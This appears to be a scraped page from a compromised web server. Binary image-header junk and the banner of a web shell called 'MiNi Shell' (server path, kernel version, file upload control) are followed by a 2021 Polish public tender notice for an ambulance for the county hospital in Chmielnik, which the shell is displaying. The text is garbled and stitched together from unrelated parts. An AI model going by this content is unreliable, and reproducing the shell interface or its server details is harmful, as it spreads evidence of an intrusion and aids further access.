JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210513/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210513/0005346602-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00053466 z dnia 2021-05-13</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> ZAKUP I DOSTAWA AMBULANSU TYPU A2 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szpital Powiatowy w Chmielniku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 003680113</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kielecka, 1-3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chmielnik</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-020</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">41/354 20 17 wew. 150</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@szpital-chmielnik.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szpital-chmielnik.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ZAKUP I DOSTAWA AMBULANSU TYPU A2 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-942ee344-b3c2-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00053466</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00029541/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 Zakup ambulansu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.szpital-chmielnik.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://www.szpital-chmielnik.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wpostępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami<br/>odbywasię przy użyciu miniPortalu https://miniportal.uzp.gov.pl/ , ePUAPu<br/>https://epuap.gov.pl/wps/portal orazpoczty elektronicznej z zastrzeżeniem, że złożenie oferty następuje<br/>wyłącznie przy użyciuminiPortalu.b) Zamawiający wyznacza następujące osoby do kontaktu z<br/>Wykonawcami: - w sprawachdotyczących przedmiotu zamówienia – Kierownik Laboratorium<br/>Diagnostycznego, tel. 41/354-30-23wew. 266, 268,- w sprawach proceduralnych - Dział<br/>Administracyjno Techniczny tel. 41/354-20-17wew. 140 lub 150, e- mail przetargi@szpital-chmielnik.pl<br/>c) Wykonawca zamierzający wziąć udział wpostępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawcaposiadający konto na ePUAP ma dostęp do formularzy:<br/>złożenia, zmiany, wycofania oferty lub wnioskuoraz do formularza do komunikacji.d) Wymagania<br/>techniczne i organizacyjne wysyłania i odbieraniadokumentów elektronicznych, elektronicznych kopii<br/>dokumentów i oświadczeń oraz informacjiprzekazywanych przy ich użyciu opisane zostały w<br/>Regulaminie korzystania z miniPortalu orazRegulaminie ePUAP. e) Maksymalny rozmiar plików<br/>przesyłanych za pośrednictwem dedykowanychformularzy do: złożenia, zmiany, wycofania oferty lub<br/>wniosku oraz do komunikacji wynosi 150 MB. f)Za datę przekazania oferty, wniosków, zawiadomień,<br/>dokumentów elektronicznych, oświadczeń lubelektronicznych kopii dokumentów lub oświadczeń oraz<br/>innych informacji przyjmuje się datę ichprzekazania na ePUAP.g) Identyfikator postępowania i klucz<br/>publiczny dla danego postępowania oudzielenie zamówienia dostępne są na Liście wszystkich<br/>postępowań na miniPortalu oraz stanowizałącznik do niniejszej SWZ. h) Zamawiający udostępni oferty<br/>oraz protokół postępowania wraz zzałącznikami po wcześniejszym uzgodnieniu terminu</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia<br/>ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia<br/>4 maja 2016r., str. 1; zwanym dalej „RODO”) informujemy, że:a) administratorem Pani/Pana danych<br/>osobowych jestSzpital Powiatowy w Chmielniku;b) administrator wyznaczył Inspektora Danych<br/>Osobowych, z którymmożna się kontaktować pod adresem e-mail: jarek.dziurda@szpital-chmielnik.pl;<br/>c) Pani/Pana daneosobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym zprzedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w<br/>trybieprzetargu nieograniczonego.d) odbiorcami Pani/Pana danych osobowych będą osoby lub<br/>podmioty,którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy<br/>P.Z.P.e)Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez okres 4<br/>lat oddnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4lata, okres przechowywania obejmuje cały czas trwania umowy;f) obowiązek podania<br/>przezPanią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem<br/>ustawowymokreślonym w przepisanych ustawy P.Z.P., związanym z udziałem w postępowaniu o<br/>udzieleniezamówienia publicznego.g) w odniesieniu do Pani/Pana danych osobowych decyzje nie<br/>będąpodejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.h) posiada Pani/Pan:-<br/>napodstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w<br/>przypadku,gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie<br/>dużego wysiłkumoże zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających<br/>na celusprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o<br/>udzieleniezamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty<br/>zakończonegopostępowania o udzielenie zamówienia);- na podstawie art. 16 RODO prawo do<br/>sprostowaniaPani/Pana danych osobowych skorzystanie z prawa do sprostowania nie może skutkować<br/>zmianąwyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy<br/>wzakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz<br/>jegozałączników);- na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczeniaprzetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o<br/>udzieleniezamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2<br/>RODO (prawodo ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania,<br/>w celuzapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznejlub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub<br/>państwaczłonkowskiego);- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdyuzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza<br/>przepisyRODO;i) nie przysługuje Pani/Panu:- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do<br/>usunięciadanych osobowych;- prawo do przenoszenia danych osobowych, o którym mowa w art. 20<br/>RODO;- napodstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawąprawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;j)<br/>przysługujePani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO<br/>przetwarzaniePani/Pana danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jestUrząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">2/26/PN/05/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup i dostawa ambulansu typu A2 dla Szpitala Powiatowego w Chmielniku o parametrach zgodnych z wymaganiami opisanymi w szczegółowym opisie zamówienia, formularzu parametrów wymaganych w załączniku nr 2 do SWZ. Oferowany ambulans musi być wykonany na pojeździe typu furgon.<br/>Ambulans ma być wyposażony w następujący sprzęt medyczny<br/>-	nosze – 1 sztuka,<br/>-	transporter noszy – 1 sztuka,<br/>-	krzesło transportowe – 1 sztuka </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34114121-3 - Karetki</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Parametry techniczne ambulansu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W zakresie obejmującym warunek zdolności zawodowej wykonawca potwierdzi warunek udziału w postępowaniu, jeżeli wykaże, że w okresie ostatnich 3 lat licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres działalności jest krótszy – w tym okresie - wykonał należycie co najmniej 3 (trzy) dostawy ambulansów typu A2 z wyposażeniem medycznym, rozumiane jako trzy umowy, o wartości nie mniejszej niż 250.000,00 PLN (dwieście pięćdziesiąt tysięcy) brutto każda. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenia o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału <br/>w postępowaniu - załączniki numer 4 i 5 do SWZ. Oświadczenia te stanowią dowody potwierdzające brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, na dzień składania ofert, tymczasowo zastępujące wymagane podmiotowe środki dowodowe (jeżeli takie są wymagane w niniejszej SWZ). Oświadczenie składają odrębnie wykonawca/każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W zakresie obejmującym warunek zdolności zawodowej wykonawca potwierdzi warunek udziału w postępowaniu, jeżeli wykaże, że w okresie ostatnich 3 lat licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres działalności jest krótszy – w tym okresie - wykonał należycie co najmniej 3 (trzy) dostawy ambulansów typu A2 z wyposażeniem medycznym, rozumiane jako trzy umowy, o wartości nie mniejszej niż 250.000,00 PLN (dwieście pięćdziesiąt tysięcy) brutto każda. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> W zakresie obejmującym warunek zdolności zawodowej wykonawca potwierdzi warunek udziału w postępowaniu, jeżeli wykaże, że w okresie ostatnich 3 lat licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres działalności jest krótszy – w tym okresie - wykonał należycie co najmniej 3 (trzy) dostawy ambulansów typu A2 z wyposażeniem medycznym, rozumiane jako trzy umowy, o wartości nie mniejszej niż 250.000,00 PLN (dwieście pięćdziesiąt tysięcy) brutto każda. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oświadczenia o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w<br/>postępowaniu - załączniki numer 4 i 5 do SWZ. Oświadczenia te stanowią<br/>dowodypotwierdzające brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu,na dzień składania ofert, tymczasowo zastępujące wymagane podmiotowe środki<br/>dowodowe(jeżeli takie są wymagane w niniejszej SWZ). Oświadczenie składają<br/>odrębniewykonawca/każdy spośród wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy<br/>oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z<br/>wykonawców wykazuje spełnianie warunków udziału w postępowaniu.2. Formularz parametrów technicznych -(załącznik nr 2 do SWZ) 3. Formularz „Parametry oceniane” - (załącznik nr 3 do SWZ) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający określa kwotę wadium w wysokości nie większej niż 3% wartości zamówienia, tj. wymaga wniesienia wadium w wysokości - 5.000,00 zł (słownie: pięć tysięcy złotych)<br/> Wadium może być wnoszone w jednej lub kilku następujących formach:<br/> pieniądzu;<br/> gwarancjach bankowych;<br/> gwarancjach ubezpieczeniowych;<br/> poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju <br/> Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>Wtakimprzypadku:•Wykonawcy występujący wspólnie są zobowiązani do<br/>ustanowieniapełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania<br/>ich wpostępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia<br/>publicznego.Pełnomocnictwo winno być załączone do oferty. • Wykonawcy wspólnie ubiegający<br/>się oudzielenie zamówienia dołączajądo oferty oświadczenie, z którego wynika, które<br/>robotybudowlane/dostawy/usługi wykonają poszczególni Wykonawcy.• Jeżeli została wybrana<br/>ofertawykonawców wspólnie ubiegającychsię o udzielenie zamówienia, zamawiający może<br/>żądaćprzed zawarciem umowy w sprawie zamówienia publicznego kopii umowy<br/>regulującejwspółpracę tych wykonawców.•Wszelka korespondencja będzie prowadzona<br/>przezzamawiającego wyłącznie z pełnomocnikiem.b) Potencjał podmiotu trzeciego W<br/>celupotwierdzenia spełnienia warunków udziału w postępowaniu, wykonawca może polegać<br/>napotencjale podmiotu trzeciego na zasadach opisanych w art. 118–123 ustawy Pzp.<br/>Podmiottrzeci, na potencjał którego wykonawca powołuje się w celu wykazania spełnienia<br/>warunków udziału w postępowaniu, nie może podlegać wykluczeniu na podstawie art. 108 ust. 1<br/>ustawyPzp c)PodwykonawstwoZamawiający nie zastrzega obowiązku osobistego wykonania przezwykonawcę kluczowychzadań / części zamówienia. Wykonawca może powierzyć<br/>wykonanieczęści zamówieniapodwykonawcy (podwykonawcom). Zamawiający wymaga, aby w<br/>przypadkupowierzenia częścizamówienia podwykonawcom, Wykonawca wskazał w ofercie<br/>częścizamówienia, którychOgłoszenie nr 2021/BZP 00016579/01 z dnia 2021-03-122021-03-<br/>12Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w<br/>trybiepodstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawywykonanie zamierza<br/>powierzyćpodwykonawcom oraz podał (o ile są mu wiadome na tymetapie) nazwy (firmy)<br/>tychpodwykonawców. Zamawiający nie będzie badał czy zachodząpodstawy wykluczenia<br/>wskazanew art. 108) u.p.z.p. do ujawnionych przez Wykonawcępodwykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia:<br/>Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej<br/>oferty w zakresie uregulowanym w art. 454-455 p.z.p. oraz wskazanym we Wzorze Umowy,<br/>stanowiącym Załącznik nr 6 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-05-26 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Drogą elektroniczną przy użyciu Miniportalu - https://miniportal.uzp.gov.pl/; e-Puapu - https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-05-26 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-05-21</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-13 Biuletyn Zamówień 